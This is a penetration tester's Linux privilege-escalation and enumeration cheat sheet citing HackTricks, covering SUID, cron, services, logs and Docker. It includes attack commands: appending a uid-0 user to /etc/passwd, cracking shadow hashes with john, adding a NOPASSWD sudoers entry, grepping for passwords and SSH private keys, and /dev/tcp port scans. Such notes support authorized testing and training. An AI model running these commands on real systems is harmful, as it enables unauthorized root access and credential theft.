Enumeration

Get Distribution Codename

lsb_release -cs

cat /etc/lsb-release

• Check EOL

• Check ExploitDB

• Check PacketStorm

• Check Kernel CVE

• Check CVE Details

Most Used Commands

sudo -l

hostname -I

uname -a

env

ifconfig

grep "sh$" /etc/passwd

getcap -r / 2>/dev/null

find / -perm -4000 -or -perm -2000 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

Check Groups

cat /etc/group

Check Ownership by group

find / -type f -group adm 2>/dev/null -ls

adm group can read log files.

cat /var/log

Check processes and Services

ps auxwwf

Read crontab file

cat /etc/crontab

Additional cron jobs

cat /etc/cron.d/*

hourly/daily/weekly/monthly

ls -la /etc/cron.*

Check Container processes

ps auxww | grep docker
ps auxww | grep lxd

User process tree + PID

pstree -p user

List background process

jobs

Current process ID

echo $$

Check Services running

ls /etc/init.d

Systemd services

systemctl list-units --type=service --state=running

SysV services (older systems)

service --status-all

If /proc is mounted with the hidepid option set to invisible the processes on the system are only visible to the current user and root users

mount | grep "/proc "

If you see knockd running

Look at the configuration file to see which ports are being use to hide the services

cat /etc/knockd.conf

• Check Port Knocking for more information to bypass this

Check Listening ports

Show listening ports

netstat -tuln
netstat -tnl

Listen to the localhost

netstat -an -p tcp

/etc/passwd

Write Permissions

Generate the password hash

openssl passwd -1 tokyo

Add the line

echo 'tokyo:$1$iLayOiAd$8dHGiU.Qvk/uqjnoWzRpm/:0:0:tokyo:/root:/bin/bash' >> passwd

/etc/shadow

Crack the hash

Create the Hash file

echo 'zoe:$y$j9T$Ct0y5TNQ/sv95CFPz510O/$7YtCDOBISfngZeQ3rsDkRcw2XTFDgHBkxDpuhyBLNO1:1002:1002:zoe:/home/zoe:/bin/bash' > shadowHash.txt

With John

john --wordlist=~/Documents/Wordlists/rockyou.txt shadow.txt --format=crypt

/etc/sudoers

Try to read it

cat /etc/sudoers

• If the file is read-only, you need to change its permissions to allow write access:

chmod +w /etc/sudoers

• Add the following line:

yourUser   ALL=(ALL) NOPASSWD: ALL

• Restore the original file permissions to make it read-only again:

chmod 440 /mnt/etc/sudoers

Scan the local network

• Find one many hosts there are in the network by doing a ping sweep:

for i in {1..254}; do (ping -c 1 192.168.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

• If nc is installed can be use to scan for open ports:

nc -zv 192.168.0.1 1-65535 2>&1 | grep -v refused | tee scan

UDP scan

nc -uzv 192.168.0.1 1-65535 2>&1 | grep -v refused

Nmap Binary

Credential Hunting

Passwords

• Search for the string pass (case-insensitive) in all files and directories recursively:

grep -iR "pass" * 2>/dev/null

• Search for the string password in files with double extension, recursively:

grep password .*.* -r 2>/dev/null

• Search for ssh keys recursively from the current directory you are in:

grep -iR -E "(ssh-(rsa|ed25519|dss|ecdsa|rsa1)[ ]+[A-Za-z0-9+/=]+|-----BEGIN [A-Z ]+PRIVATE KEY-----)" * 2>/dev/null

Hashes

MD5 hashes

grep -aPo '[a-fA-F0-9]{32}' /DESIRED/PATH

SHA-1

grep -aPo '[a-fA-F0-9]{40}' /DESIRED/PATH

SHA-256

grep -aPo '[a-fA-F0-9]{64}' /DESIRED/PATH

SHA-512

grep -aPo '[a-fA-F0-9]{128}' /DESIRED/PATH

File Enumeration

find

Look by extensions

find /home/user -name "*.txt"

Look by size

find / -type f -size +10M

Use regex

find / -regex ".*alacritty.*" 2>/dev/null

Look for multiple files

find . -type f | grep -vP '(class|java|lst|jar|original|gz|jpg|png|svg|css|html|js|mvnw|HELP.md|mvnw.cmd|gitignore)$'

Show Sizes Current Directory

du -sh *

Largest 10 directories

sudo du -hsx /* | sort -rh | head -n 10

Check Environment

Check hostname status

hostnamectl status

uptime

Stats 5s for 10 itinerations

vmstat 5 10

Check RAM remaining to Memory Locking

Check

ulimit -l

Set a new limit

ulimit -l 10240

Check Periherals

Shows details about all block devices

lsblk -f

List USB

lsusb

List Peripherals

lspci

Check Logs

Current login user

w

Display login records

last

Display bad login attempts

lastb

Kernel and boot messages

dmesg

journalctl

Shows logs live

journalctl -f 

Logs from the current boot

journalctl -b

Logs from the previous boot

journalctl -b -1

Logs from a specific service

journalctl -u <service>

Logs for a specific process

journalctl _PID=<pid>

Shows logs from the kernel

journalctl -k

Logs by time-frame

journalctl --since "2024-11-01" --until "2024-11-10"

Priority Levels

journalctl -p <level>

0 --> emergency
1 --> alert
2 --> critical
3 --> error
4 --> warning
5--> notice
6 --> informational
7 --> debug

Use lft to trace hops in the network

sudo lft <IP:PORT>

• If you suspect that there is a VM or docker being hosted in a different port you can use lft and check if there are differences in the results.

Find the processes associated with a port

lsof -i -n -P <port_number>

Shows TCP open connections in the Listen state

lsof -wnP -iTCP -sTCP:LISTEN

Listening ports & services

ss -tuln

Listening ports + PID

ss -tulnp | grep PID

Discover reachable internal networks

traceroute <IP>

Enumerating Docker

Host names are usually numerical IDs

Always check the environment variables

• Confirm the presence of .dockerenv

Check if running as root

cat /proc/self/status

Check SUID/SGID

find / -type f \( -perm -4000 -o -perm -2000 \)

Check processes

ps aux

Check the namespaces

ls -al /proc/self/ns/

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

If the socket is mounted you may be able to use docker-cli:

mount | grep docker.sock

ls -l /var/run/docker.sock

Understand the Network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Check the IPs

ip addr

Check the routing table

cat /proc/net/fib_trie

Always ping sweep the subnets

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Scan ports

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

Use OpenSSL to scan ports

for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do (echo "172.19.0.$host:$port" && openssl s_client -connect 172.19.0.$host:$port 2>/dev/null | grep CONNECTED) & done; done; wait

Check for Mounted File Systems

cat /proc/mounts
mount | grep <directory>

Look for vulnerabilities and misconfiguration

cat /etc/docker/daemon.json

Loop to mount containers

mkdir sda{1,2,3,4,5}
for number in 1 2 3 4 5; do mount /dev/sda$number sda$number; done

docker-cli

List running containers

docker ps

• Check for containers running with elevated privileges (--privileged, --cap-add).

• Look for containers that share host namespaces or file systems.

Check for docker images

docker images

Look for containers running as root or with --privileged mode:

docker inspect

Checklist - Linux Privilege Escalation - HackTricksbook.hacktricks.wiki